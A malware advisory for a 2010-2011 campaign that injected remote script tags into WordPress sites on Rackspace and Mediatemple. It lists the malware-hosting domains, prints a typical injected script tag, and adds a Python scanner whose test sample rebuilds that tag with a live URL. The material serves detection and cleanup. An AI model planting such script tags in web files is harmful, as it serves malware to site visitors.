Description:
Malware injections related to massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011.
Loads malware from:
hxxp://m3h.toolbarinc[.]com
hxxp://w7c5lrhqu.newsapis[.]us
hxxp://brown.smartenergymodel[.]com/js/jquery.min.js
hxxp://azure.smartenergymodel[.]com/js/jquery.min.js
hxxp://r91nu.emapis[.]org/js/jquery.min.js
hxxp://d0j.emapis[.]org/js/jquery.min.js
hxxp://khaki.smartenergymodel[.]com/js/jquery.min.js
hxxp://purple.gaindirectory[.]org/js/jquery.min.js
And other domains.
Typical injected code:
<script src=hxxp://azure.smartenergymodel[.]com/js/jquery.min.js>
It infects .php, .html and .js files.
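A minimal scanner for the injection described above, as an added example that is not part of the original page: it flags script tags whose src host falls under one of the domains listed here, in the three file types named. Matching on the parent domain (any subdomain) is an assumption of this example, and since the page notes that other domains were also used, the list is not complete.

```python
import re
from pathlib import Path

# Parent domains taken from the URLs on this page, stored defanged and
# refanged at load time. Matching any subdomain is this example's assumption.
BAD_DOMAINS = [d.replace("[.]", ".") for d in (
    "toolbarinc[.]com", "newsapis[.]us", "smartenergymodel[.]com",
    "emapis[.]org", "gaindirectory[.]org",
)]
TARGET_EXT = {".php", ".html", ".js"}  # file types the page says get infected

# src may be quoted or unquoted (the page's sample is unquoted).
SCRIPT_SRC = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']?\s*(?:https?:)?//\s*([^\s\"'/>]+)",
    re.IGNORECASE)

def is_bad_host(host):
    """True if host is a listed domain or a subdomain of one."""
    host = host.lower().split(":")[0].rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BAD_DOMAINS)

def find_injections(text):
    """Return (line_number, host) for each script tag loading from a listed domain."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        if is_bad_host(m.group(1)):
            hits.append((text.count("\n", 0, m.start()) + 1, m.group(1).lower()))
    return hits

def scan_tree(root):
    """Scan .php/.html/.js files under root; return {path: hits} for infected files."""
    report = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in TARGET_EXT:
            hits = find_injections(p.read_text(errors="replace"))
            if hits:
                report[str(p)] = hits
    return report

# Constructed sample: a legitimate jQuery include followed by the injected tag.
SAMPLE = (
    "<?php get_header(); ?>\n"
    '<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>\n'
    "<script src=hxxp://azure.smartenergymodel[.]com/js/jquery.min.js></script>\n"
).replace("hxxp", "http").replace("[.]", ".")

if __name__ == "__main__":
    print(find_injections(SAMPLE))
```

A clean result only means none of the listed domains were found, not that the site is uninfected.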
Related links:
http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/
Affecting: WordPress websites. Mostly on Rackspace and Mediatemple.
Mitigation
How to clean a hacked WordPress site